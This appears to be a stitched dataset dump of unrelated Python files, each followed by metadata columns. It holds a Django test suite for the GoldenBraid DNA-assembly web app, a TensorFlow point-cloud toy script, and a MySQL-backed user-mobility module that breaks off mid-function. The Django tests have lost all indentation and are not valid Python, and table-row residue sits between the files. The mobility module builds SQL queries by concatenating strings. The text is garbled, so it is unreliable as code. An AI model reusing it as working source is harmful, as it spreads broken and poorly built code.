from Bio import SeqIO
import goldenbraid
from goldenbraid.views.feature import FeatureForm
from goldenbraid.tests.test_fixtures import FIXTURES_TO_LOAD
from goldenbraid.models import Feature
from goldenbraid.tags import VECTOR_TYPE_NAME, MODULE_TYPE_NAME
TEST_DATA = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
class FeatureTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_feature_page(self):
client = Client()
url = reverse('feature_view', kwargs={'uniquename': 'pAn11'})
response = client.get(url)
assert response.status_code == 200
assert "Feature pAn11" in str(response)
def test_add_feature_form(self):
test_data = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
# test of the form
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertTrue(form.is_valid())
# test of the form with blanck values
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'vecto'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('type')
# vector does not exist
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': VECTOR_TYPE_NAME, 'enzyme_out': 'vector1_enz_out',
'vector': 'vector1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('vector')
def test_add_feature_view(self):
# test of the form page
# test of the form
User.objects.create_user(username='admin', email='<EMAIL>',
password='password')
gb_path = os.path.join(TEST_DATA, 'pAn11_uniq.gb')
client = Client()
url = reverse('add_feature')
# no login, no access
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
client.login(username='admin', password='password')
# show form
response = client.get(url)
assert "pDGB1_alpha1" in str(response)
# add a feature
url = reverse('add_feature')
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
# TODO url to genbank file
# response = client.get('/media/genbank_files/pAn11.gb')
feat = Feature.objects.get(uniquename='pAn11_uniq')
assert feat.name == 'vector1'
assert feat.props == {u'Description': [u'vector1 desc'],
u'Reference': [u'vector1 ref']}
# add a feature
url = reverse('add_feature')
gb_path = os.path.join(TEST_DATA, 'GB_DOMEST_15.gb')
response = client.post(url, {'name': 'vector1',
'type': 'TU',
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_alpha2',
'gbfile': open(gb_path)})
assert response.status_code == 200
os.remove(os.path.join(proj_settings.MEDIA_ROOT,
feat.genbank_file.name))
def test_search_feature(self):
client = Client()
url = reverse('search_features')
response = client.get(url)
assert response.status_code == 200
assert "<option value=" in str(response)
response = client.post(url, {'name_or_description': 'pAn11'})
assert response.status_code == 302
response = client.post(url, {'kind': 'TER'})
assert response.status_code == 200
assert "<td>This is a pGreen destiny vector of the" in str(response)
client.login(username='test', password='<PASSWORD>')
response = client.post(url, {'only_user': True})
assert response.status_code == 200
assert 'pDGB2_alpha2R' in str(response)
class MultipartiteFreeTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_view(self):
client = Client()
url = reverse('multipartite_view_free')
response = client.get(url)
assert "pDGB2_alpha1R" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '1'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11'})
assert "An11" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '2'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferas'})
assert 'feature does not exist' in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase'})
assert "pT35S" in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase',
'part_3': 'pT35S'})
assert "<p>You have assembled in the GoldenBraid" in str(response)
# reverse vector
url = reverse('multipartite_view_free_genbank')
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'pMYB12',
'part_3': 'pTerm2A11',
'vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
assert seqrec1.name == 'GB_UA_E'
multipartite_free_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_free_seq2 = str(seqrec2.seq)[4:]
multipartite_free_seq2 += str(seqrec2.seq)[:4]
assert multipartite_free_seq1 == multipartite_free_seq2
# with more than one part of the same type
url = reverse('multipartite_view_free', kwargs={'form_num': '5'})
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "<p>Other.2:<a href='/feature/GB0655'>GB0655</a></p>" in str(response)
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('multipartite_view_free_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_E' in str(response)
assert 'LOCUS' in str(response)
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_F' in str(response)
assert 'LOCUS' in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert '(pP2A11,GB0365,GB0653,GB0655,pT35S)pDGB1_alpha1' in str(response)
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_free_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert "75 ng of pPE8" in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "75 ng of GB0653" in str(response)
def test_mantras_bug(self):
'it test that the protocol file is generated'
client = Client()
client.login(username='admin', password='password')
url = reverse('multipartite_view_add')
response = client.get(url)
assert response.status_code == 200
response = client.post(url, {'Other': 'GB_UD_186',
'Other.2': 'GB_UD_188',
'Vector': 'pDGB1_alpha1',
'category': 'free',
'name': 'aa',
'description': '',
'reference': 'aa',
'order': 'Other:Other.2'})
class MultipartiteTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_empty_type(self):
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': ''})
response = client.get(url)
assert "/do/multipartite/basic" in response.content
def test_basic_type(self):
'It tests the basic typo of the form'
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url)
assert """<p><label for="id_TER">Ter:</label>""" in str(response)
assert """<select id="id_TER" maxlength="100" name="TER">""" in str(response)
assert """<option value="pDGB1_alpha1R">pDGB1_alpha""" in str(response)
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
# print response
assert 'error' not in response
assert response.status_code == 200
client = Client()
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "LOCUS" in str(response)
client = Client()
url = reverse('multipartite_view',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTno'})
err1 = """<ul class="errorlist"><li>This field is required.</li></ul"""
assert err1 in str(response)
err2 = """<ul class="errorlist"><li>This feature does not exist in"""
assert err2 in str(response)
# forward vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP35S',
"CDS": 'pMYB12',
"TER": 'pTnos',
'Vector': 'pDGB1_omega2'})
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMyb_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)
assert multipartite_seq1 == multipartite_seq2
# reverse vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP2A11',
"CDS": 'pMYB12',
"TER": 'pTerm2A11',
'Vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)[4:]
multipartite_seq2 += str(seqrec2.seq)[:4]
assert multipartite_seq1 == multipartite_seq2
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'multi_type': 'basic',
"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "75 ng of pPE8" in str(response)
def test_genbank_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_genbank', kwargs={'multi_type':
'basic'})
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'multi_type': 'basic',
"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert 'LOCUS' in str(response)
class BipartiteViewTest(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_bipartite(self):
client = Client()
# do initial
url = reverse('bipartite_view')
response = client.get(url)
assert """<option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option>""" in str(response)
# do page 1
url = reverse('bipartite_view', kwargs={'form_num': '1'})
response = client.post(url, {'part_1': 'GB0125'})
assert 'readonly' in str(response)
assert 'value="GB0125"' in str(response)
assert """<p><label for="id_part_2">Part 2:</label>""" in str(response)
# do page 2
url = reverse('bipartite_view', kwargs={'form_num': '2'})
response = client.post(url, {'part_1': 'GB0125', 'part_2': 'GB0126'})
assert 'value="GB0126"' in str(response)
assert "pDGB1_omega1" in str(response)
# do page 3
url = reverse('bipartite_view', kwargs={'form_num': '3'})
response = client.post(url, {'part_1': 'GB0125', 'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert """<INPUT type="hidden" name="Vector" value="pDGB1_omega1">""" in str(response)
assert """ <p>The resulted sequence of the assembly is""" in str(response)
# forward vector
url = reverse('bipartite_view_genbank')
response = client.post(url, {'part_1': 'GB0129',
'part_2': 'GB0131',
'Vector': 'pDGB1_alpha1'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
bipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBRosDelMyb.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
bipartite_seq2 = str(seqrec2.seq)
assert bipartite_seq1 == bipartite_seq2
# check bipartite_view_genbank
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('bipartite_view_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq':'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert 'LOCUS' in str(response)
# check bipartite_view_protocol
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('bipartite_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'name': 'kk',
'Description': 'desc',
'Reference': 'ref',
'assembled_seq': 'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert 'Bipartite Assembly Protocol' in str(response)
# check bipartite_view_add
def test_add_view(self):
'it test that the protocol file is generated'
User.objects.create_user(username='admin', email='<EMAIL>',
password='password')
client = Client()
client.login(username='admin', password='password')
url = reverse('bipartite_view_add')
response = client.get(url)
assert response.status_code == 200
response = client.post(url, {'assembled_seq': 'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1',
'name': 'aa',
'description': '',
'reference': 'aa'})
assert response.status_code == 302
class DomesticationViewTest(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_domestication(self):
client = Client()
# do initial
url = reverse('domestication_view')
response = client.get(url)
assert ("""<option value="NTAG (B2)">NTAG (B2)</option>""") in str(response)
# send data to formulary to test validations
gb_path = os.path.join(TEST_DATA, 'domseq.gb')
# add seq and category
response = client.post(url, {'seq': open(gb_path),
'category': 'NTAG (B2)'})
# print str(response)
assert """<ul class="errorlist"><li>The provided s""" in str(response)
# not add a sequence
response = client.post(url, {'seq': '',
'category': 'NTAG (B2)'})
assert """<ul class="errorlist"><li>Fasta or genbank File Required</li></ul>""" in str(response)
# add category, prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': 'ggac', 'suffix': 'cgtc',
'category': '3UTR+TERM (B6-C1)'})
assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>"""in str(response)
# add category and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': 'cgtc',
'category': '3UTR+TERM (B6-C1)'})
assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>"""in str(response)
# add suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': 'cgtc',
'category': ''})
assert """<ul class="errorlist"><li>You must provide prefix and suffix together</li></ul>""" in str(response)
# not add category nor prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': '', 'category': ''})
assert """<ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul>""" in str(response)
# check that uses validators
response = client.post(url, {'seq': open(gb_path),
'category': 'CDS (B3-B4-B5)'})
assert 'The provided seq must start with start' in str(response)
response = client.post(url, {'seq': open(gb_path),
'category': 'goi (B2-B3)'})
assert 'The provided seq must have less' in str(response)
# sequence start with atg
fasta_path = os.path.join(TEST_DATA, 'domseqatg.fasta')
response = client.post(url, {'seq': open(fasta_path),
'category': 'SP (B3)'})
assert 'The provided seq must start with start' not in str(response)
# domesticate with prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'suffix': 'ACCT', 'prefix': 'TTCC'})
assert "<p>Prefix:TTCC</p>" in str(response)
residues = str(SeqIO.read(open(gb_path), format='gb').seq)
response = client.post(url, {'residues': residues,
'category': 'CDS (B3-B4-B5)'})
assert 'The provided seq must start with start' in str(response)
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('domestication_view_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccccccccccccccccccccccctttgacctcgaaacgccccc',
'prefix': 'ggag',
'suffix': 'aatg',
'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
'seq_name': 'test',
'with_intron': '0'})
assert 'LOCUS' in str(response)
# check bipartite_view_protocol
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('domestication_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccctccccccccccccccccccccccccccctttgacctcgaaacgccccc',
'prefix': 'ggag',
'suffix': 'aatg',
'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
'seq_name': 'test',
'with_intron': '0'})
assert "Oligo forward: GCGCCGTCTCGCTCGGGAGGAGAGGGGGGGGAGAGAGAT" in str(response)
| en | 0.58667 | # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de # Investigaciones Cientificas # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # test of the form # test of the form with blanck values # test of the form with wrong type # vector does not exist # test of the form with wrong type # test of the form page # test of the form # no login, no access # show form # add a feature # TODO url to genbank file # response = client.get('/media/genbank_files/pAn11.gb') # add a feature # reverse vector # with more than one part of the same type # with more than one part of the same type # with more than one part of the same type <p><label for="id_TER">Ter:</label> <select id="id_TER" maxlength="100" name="TER"> <option value="pDGB1_alpha1R">pDGB1_alpha # print response <ul class="errorlist"><li>This field is required.</li></ul <ul class="errorlist"><li>This feature does not exist in # forward vector # reverse vector # do initial <option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option> # do page 1 <p><label for="id_part_2">Part 2:</label> # do page 2 # do page 3 <INPUT type="hidden" name="Vector" value="pDGB1_omega1"> <p>The resulted sequence of the assembly is # forward vector # check bipartite_view_genbank # check bipartite_view_protocol # check bipartite_view_add # do initial <option value="NTAG (B2)">NTAG (B2)</option> # send data to formulary to test validations # add seq and category # print str(response) <ul class="errorlist"><li>The provided s # not add a sequence <ul class="errorlist"><li>Fasta or genbank File Required</li></ul> # add category, prefix and suffix <ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul> # add category and suffix <ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul> # add suffix <ul class="errorlist"><li>You must provide prefix and suffix together</li></ul> # not add category nor prefix and suffix <ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul> # check that uses validators # sequence start with atg # domesticate with prefix and suffix # check bipartite_view_protocol | 2.094356 | 2 |
points2mesh/idiss_toy_example.py | Hyde46/pc2mesh | 0 | 6617429 | <reponame>Hyde46/pc2mesh
import tensorflow as tf
import numpy as np
from tensorpack import *
from tensorpack.input_source import QueueInput
from tensorpack.dataflow import (PrintData, BatchData)
from wrs_df import *
from tabulate import tabulate
from scipy.spatial.distance import pdist, squareform
np.random.seed(42)
tf.set_random_seed(42)
class FakePointCloud(object):
"""
docstring for FakePointCloud
"""
def __init__(self, B, N, K, Din, Dout, Dp, N2=1, scaling=1):
super(FakePointCloud, self).__init__()
assert K < N
self.B = B
self.N = N
self.K = K
self.Din = Din
self.Dout = Dout
self.Dp = Dp
self.N2 = N2
dtype = np.float64
def find_neighbors(positions, K):
# B, Dpos, N
all_neighbors = []
for batch in positions:
distances = squareform(pdist(batch.T, 'euclidean'))
all_neighbors.append(np.argsort(distances, axis=1)[:, :K])
return np.array(all_neighbors).transpose(0, 2, 1)
def random_values(shape):
return np.random.randn(*shape).astype(np.float32)
self.theta = random_values(
[1, self.Dp, self.Din, self.Dout]).astype(dtype)
self.bias = random_values([self.Din, self.Dout]).astype(dtype)
self.position = random_values([self.B, self.Dp, self.N]).astype(dtype)
self.features = random_values([self.B, self.Din, self.N]).astype(dtype)
self.neighborhood = find_neighbors(
self.position, self.K).astype(dtype=np.int32)
def init_ops(self, dtype=np.float32):
self.theta_op = tf.convert_to_tensor(self.theta.astype(dtype))
self.bias_op = tf.convert_to_tensor(self.bias.astype(dtype))
self.features_op = tf.convert_to_tensor(self.features.astype(dtype))
self.position_op = tf.convert_to_tensor(self.position.astype(dtype))
self.neighborhood_op = tf.convert_to_tensor(self.neighborhood)
def expected_feature_shape(self):
return [self.B, self.Din, self.N]
def expected_output_shape(self):
return [self.B, self.Dout, self.N]
def fake_pc_loader():
for k in range(1):
pc = FakePointCloud(B=1, N=6, K=3, Din=3, Dout=3, Dp=3)
pc.init_ops(dtype=np.float32)
yield np.array([pc.position, pc.features+10])
if __name__ == '__main__':
# Generate point cloud
df = DataFromGenerator(fake_pc_loader)
df = WRSDataFlow(
df, neighborhood_sizes=3, sample_sizes=[6, 3])
df.reset_state()
for d in df:
# kdt_coarse = KDTree(d[0], leaf_size=16, metric='euclidean')
# kdt_sparse = KDTree(d[4], leaf_size=16, metric='euclidean')
# neighborhood = kdt_sparse.query(
# kdt_coarse.data, k = 4, dualtree = False, return_distance = False)
# print d[0]
# print d[1]
print d[2]
print d[3]
print " "
# print d[4]
# print d[5]
print d[6]
print d[7]
print " "
'''
# print d[8]
print d[9]
print d[10]
print d[11]
print ""
print ""
'''
| import tensorflow as tf
import numpy as np
from tensorpack import *
from tensorpack.input_source import QueueInput
from tensorpack.dataflow import (PrintData, BatchData)
from wrs_df import *
from tabulate import tabulate
from scipy.spatial.distance import pdist, squareform
np.random.seed(42)
tf.set_random_seed(42)
class FakePointCloud(object):
"""
docstring for FakePointCloud
"""
def __init__(self, B, N, K, Din, Dout, Dp, N2=1, scaling=1):
super(FakePointCloud, self).__init__()
assert K < N
self.B = B
self.N = N
self.K = K
self.Din = Din
self.Dout = Dout
self.Dp = Dp
self.N2 = N2
dtype = np.float64
def find_neighbors(positions, K):
# B, Dpos, N
all_neighbors = []
for batch in positions:
distances = squareform(pdist(batch.T, 'euclidean'))
all_neighbors.append(np.argsort(distances, axis=1)[:, :K])
return np.array(all_neighbors).transpose(0, 2, 1)
def random_values(shape):
return np.random.randn(*shape).astype(np.float32)
self.theta = random_values(
[1, self.Dp, self.Din, self.Dout]).astype(dtype)
self.bias = random_values([self.Din, self.Dout]).astype(dtype)
self.position = random_values([self.B, self.Dp, self.N]).astype(dtype)
self.features = random_values([self.B, self.Din, self.N]).astype(dtype)
self.neighborhood = find_neighbors(
self.position, self.K).astype(dtype=np.int32)
def init_ops(self, dtype=np.float32):
self.theta_op = tf.convert_to_tensor(self.theta.astype(dtype))
self.bias_op = tf.convert_to_tensor(self.bias.astype(dtype))
self.features_op = tf.convert_to_tensor(self.features.astype(dtype))
self.position_op = tf.convert_to_tensor(self.position.astype(dtype))
self.neighborhood_op = tf.convert_to_tensor(self.neighborhood)
def expected_feature_shape(self):
return [self.B, self.Din, self.N]
def expected_output_shape(self):
return [self.B, self.Dout, self.N]
def fake_pc_loader():
for k in range(1):
pc = FakePointCloud(B=1, N=6, K=3, Din=3, Dout=3, Dp=3)
pc.init_ops(dtype=np.float32)
yield np.array([pc.position, pc.features+10])
if __name__ == '__main__':
# Generate point cloud
df = DataFromGenerator(fake_pc_loader)
df = WRSDataFlow(
df, neighborhood_sizes=3, sample_sizes=[6, 3])
df.reset_state()
for d in df:
# kdt_coarse = KDTree(d[0], leaf_size=16, metric='euclidean')
# kdt_sparse = KDTree(d[4], leaf_size=16, metric='euclidean')
# neighborhood = kdt_sparse.query(
# kdt_coarse.data, k = 4, dualtree = False, return_distance = False)
# print d[0]
# print d[1]
print d[2]
print d[3]
print " "
# print d[4]
# print d[5]
print d[6]
print d[7]
print " "
'''
# print d[8]
print d[9]
print d[10]
print d[11]
print ""
print ""
''' | en | 0.499295 | docstring for FakePointCloud # B, Dpos, N # Generate point cloud # kdt_coarse = KDTree(d[0], leaf_size=16, metric='euclidean') # kdt_sparse = KDTree(d[4], leaf_size=16, metric='euclidean') # neighborhood = kdt_sparse.query( # kdt_coarse.data, k = 4, dualtree = False, return_distance = False) # print d[0] # print d[1] # print d[4] # print d[5] # print d[8] print d[9] print d[10] print d[11] print "" print "" | 2.21397 | 2 |
utils/mobility.py | pengyuan/markov2tensor | 1 | 6617430 | <reponame>pengyuan/markov2tensor<gh_stars>1-10
#!/usr/bin/env python
# coding: UTF-8
"""
gowalla_filter:
SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc;
找出那些比率(所有地点/不同地点)合适的用户
所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality
eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析)
"""
from __future__ import division
import MySQLdb
from scipy import linalg
import numpy as np
from numpy.matlib import eye, identity
from preprocess import settings
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2014 <NAME>'
__license__ = 'Public domain'
#连接数据库
def init_data(users, train = 1):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
#print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item] = index
axis_pois[index] = item
index += 1
datas = {}
predicts = {}
recommends = {}
for user in users:
try:
sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
for item in train_data:
data.append(pois_axis[item])
train_set = set(train_data)
predict = []
recommend = []
for item in remain_data:
if item in train_set:
predict.append(pois_axis[item])
else:
recommend.append(pois_axis[item])
datas[user] = data
predicts[user] = predict
recommends[user] = recommend
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 连接数据库
'''strategy 1: arrival_slot; 2: existance'''
def init_data2(users, train, time_slice):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
# print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item[0]] = index
axis_pois[index] = item[0]
index += 1
datas = {}
predicts = {}
recommends = {}
# trains = {}
time_slot = range(0, time_slice)
for user in users:
try:
# sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot)
sql = "select poi_name, arrival_timestamp from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = {}
for slot in time_slot:
data[slot] = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
# train_data_list = []
for item in train_data:
# print data.keys()
index = item[1] % 86400 // (3600 * (24 // time_slice))
# print type(index)
# print data.has_key(index)
data[index].append(pois_axis[item[0]])
# train_data_list.append(pois_axis[item[0]])
datas[user] = data
# train_set = set(train_data_list)
# print "trainset: ", train_set
predict = {}
recommend = {}
for slot in time_slot:
recommend[slot] = set()
predict[slot] = set()
for item in remain_data:
axis = pois_axis[item[0]]
index = item[1] % 86400 // (3600 * (24 // time_slice))
if axis in set(data[index]):
predict[index].add(pois_axis[item[0]])
else:
recommend[index].add(pois_axis[item[0]])
predicts[user] = predict
recommends[user] = recommend
# trains[user] = train_set
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 从线性停留点序列计算马儿可夫转移矩阵或转移张量
def trans(data, dimensionality, order):
# 得到停留点序列长度
data_length = len(data)
if order == 2:
tensor = [[0 for i in range(dimensionality)] for j in range(dimensionality)]
for index in range(data_length-1):
check_list = data[index:index+2]
tensor[check_list[0]][check_list[1]] += 1
for item in range(dimensionality):
count_sum = 0
for item2 in range(dimensionality):
count_sum += tensor[item][item2]
if 0 == count_sum:
continue
else:
